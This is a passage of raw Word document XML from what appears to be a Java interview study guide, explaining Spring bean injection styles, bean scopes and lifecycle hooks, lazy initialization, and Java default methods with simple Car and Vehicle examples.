    <w:p w14:paraId="1878FF74"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74ECB57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FA9C8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52C7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ar has a constructor that takes an Engine object. Spring will automatically inject an instance of Engine when it creates the Car bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BD1E2C"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etter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B44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etter injection, dependencies are provided through setter methods. Spring will call the setter method after the bean has been instantiated, allowing for the injection of dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3ED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D9FE9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AC1B59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04607C4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048CBDDC" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265C63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15D84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Engine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBED91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239B3A2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1281C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0944B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calls the setEngine() method after the Car bean is instantiated to inject the Engine dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E451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 Field Injection (Direct Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACDAC6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5C51D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1BD405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459EDC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9047AA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BE361D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C6B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ypes of Bean Scopes in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EDBCA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have different </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scopes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which define their lifecycle and how they are instantiated and managed by the Spring container. The scope of a bean defines how long it lives and how it is shared across the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C324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ingleton Scope (Default Scope)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2C508"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ingleton-scoped bean is instantiated once for the entire Spring container. This is the default scope if no scope is defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DDB6EC"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Singleton beans are shared across the entire application, and any reference to the bean points to the same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF4E9B"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37661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254CC7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5A349C9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F6913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r bean is created once and shared across the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19D3C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DF053D"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Prototype Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8BD9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prototype-scoped bean is instantiated each time it is requested from the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF22AC"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Every time a prototype bean is requested, a new instance of the bean is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22121D3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F897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ADB201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36AF5B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9611B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every time it is requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B31F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69864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Request Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F507987"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HTTP request. This is typically used for web applications where a new bean instance is needed for each HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D530AEE"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When the HTTP request ends, the bean is destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D732F6"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BCAF3C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F75FD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7425155E"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DB1BBF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request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686016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F179A1"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 Session Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D3F6D2"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ession-scoped bean is created once per HTTP session. The bean is maintained for the entire duration of the user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0AE41"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stored in the session and remains available as long as the session is active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619D6E4"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55DC8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0F99F2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135C586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58B8B6E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session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D479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0EC0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 Application Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202BF03C"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The bean is created once per Spring ServletContext. This scope is typically used for beans that are shared across all sessions and requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABF4E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created once during the application context initialization and is available throughout the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF2A3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F637A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653672C"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application")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A9AD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306DCE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the entire application context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8BE0C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3A135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 WebSocket Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305F376"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is scope is used for WebSocket communication. A WebSocket-scoped bean is created once per WebSocket connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659C871"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maintained for the duration of the WebSocket session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B50F9"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0E239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E784E78"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ebsocket")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386719A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6650D1A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WebSocket session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458791F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F68CB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ypes of Bean Initialization and Destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19810AD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provides ways to manage the initialization and destruction of beans. These are commonly used for resource management, such as opening or closing connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068ABE18"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Using @PostConstruct and @PreDestroy Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AB5139"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 This annotation is used to specify a method that should be called immediately after the bean's properties have been set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E57BB85"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 This annotation specifies a method that should be called just before the bean is destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C19F8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12D3F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65997C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6213F7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48C36E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12224B9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nitialized");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB2212"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16DF2F" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7CF55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7ADC568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71F0700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destroyed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3006A77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5361D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E28C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Using init-method and destroy-method in XML Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE93A2" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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can be defined in XML configuration to specify the initialization and destruction methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1402A30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43593C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car" class="com.example.Car" init-method="init" destroy-method="cleanup"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672BDF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ing Beans Using Spring Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED841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accessed or called through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eanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F05EE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for the Spring IoC container, and it is used to retrieve beans that are defined in the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2474F4B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DD10E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 context = new ClassPathXmlApplicationContext("beans.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE7A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car = context.getBean(Car.class);  // Access the Car bean from the context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C16F2"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Initialization of Beans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A937A1" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Spring initializes beans eagerly (i.e., at the start of the application). However, you can use lazy initialization to delay the creation of the bean until it is actually required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7DCB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6C93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A6783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cope("singleton")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4039A37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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41470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94EAA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 will be created only when requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FDB9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C33055"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C2200E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injected and called in a variety of ways, depending on the requirements of your application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F885C9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Inject dependencies via the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5567DF"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Inject dependencies via setter methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107EAD6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Inject dependencies directly into fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CE342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Scopes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Define the lifecycle of a bean using singleton, prototype, request, session, application, or WebSocket scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2EAA6"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and Destruction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use @PostConstruct/@PreDestroy or XML configuration methods for bean initialization and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0A42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Delay bean creation until it is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E06D28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tions allow you to fine-tune the behavior of beans and their dependencies based on the specific needs of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24854D36" w14:textId="7D0BDE3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18" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0F27A" w14:textId="3CC761B3" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc197867287"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the default methods</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="5B0E45A6" w14:textId="7FF7EB21" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B"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s part of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to allow developers to add new functionality to interfaces without breaking the existing implementations of those interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92DC74"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are Default Methods?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16201E3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Default Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B7A2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default method is declared using the default keyword before the method signature in the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A612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Interface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD91A5"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gular abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29529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egularMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E532B8D" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BA83E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69624F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7B9AE3C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002201E6"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F808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E2F982"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148AF47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e method has a body and provides a default implementation in the interface itself. This is different from abstract methods, which don't provide a body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1B6B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Default Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a class implementing an interface provides a new implementation for a default method, the default implementation is overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC33297"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terface Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a class implements multiple interfaces that contain default methods with the same signature, the class must explicitly override the method to resolve the ambiguity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7898A1"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llowed in Abstract Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods are only allowed in interfaces, not in abstract classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F844729"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AAAE3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that demonstrates the use of a default method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB126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6B2EEF9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB11D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77D8E4D5" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56CFBD4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C83E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fault void honk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C7F6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03111B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80D41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A559547" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704CB70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4A17945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5A38C6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6E4F06D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68C7413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EFC8E" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CBB84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ptional: Override the default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C69CD8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FE2A9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honk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB5344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honking");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A37BE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D65F2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0C76FD" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3DA7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A4AAAB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84526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85AE38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drive();  // Output: Car is driving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D8B51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Car honking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A94DE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1DDF5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0D2F2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4D77CE3"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ehicle interface has a default method honk() with a default implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DEB208"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implements Vehicle and provides its own implementation of honk(). This overrides the default implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60C522"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ar class hadn't overridden honk(), the default implementation from the Vehicle interface would be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77763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Default Methods?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF76D8"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methods to an interface without breaking existing classes that implement the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F2C42"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provide a common behavior (implementation) in the interface itself, avoiding duplication in all implementing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1E07A"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Default methods enable you to avoid issues when multiple interfaces provide the same default method (although this may need explicit resolution in case of conflicts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D95F0"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nflict Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E0E7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default methods with the same signature, and a class implements both interfaces, the class must override the method to resolve the conflict:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF171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54B4EDF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3C1A3A8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55443B6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81A5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07445D" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD6659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3E037E5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271188A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66B4FE81"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49AC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022D5E" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569332A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680B4A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solving conflict by overriding the default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427611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5C4F4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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5FC4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3F3C71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CC0AE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CBF214" w14:textId="77777777" w:rsidR="00D87F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D87F4B" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D12A3C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F222A8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C6C5C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09E2E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3F65CC8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32A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34551"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79729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19" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E48C90" w14:textId="35174E60" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc197867288"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can I add one more new default method in my child class? Does it give any problems with my existing classes</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="4F402F73" w14:textId="14BDC807" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA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you can add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but whether it creates problems depends on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>context</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which it is done and how the class hierarchy is structured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6924D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key points to consider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B84D8A"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ing a Default Method in the Child Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183686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new default method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it will be treated as a regular method within the child class and won't directly impact the parent class or its existing implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948CC8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8DBF96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09FB45B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7ADABBD" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA21E9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in the interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627D6CA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00BD8FD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3450BA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DC842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7590C" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AFF06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52A5A3D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8C1A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14F3731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92E8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AE0AE" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBA599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a new default method in the child class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510AC7C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penSunroof() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FB8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ening sunroof");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8236B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79EFE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67B90" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEF38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74624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8EFBA3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FC8BE2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 (default implementation in Vehicle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333D20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0C69A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EC83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494EDC7"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does not affect the existing default method honk() from the Vehicle interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072E3C8"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add new methods (like openSunroof()) in the Car class, and they won't interfere with any existing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22992622"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or Overriding Default Methods in the Child Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68589BD9"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lready has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you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t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to provide your own implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5FC833"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introduces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If You Add a New Default Method to the Parent Interface?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE523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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an existing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ich is already implemented by some classes), it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>will not break the existing classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
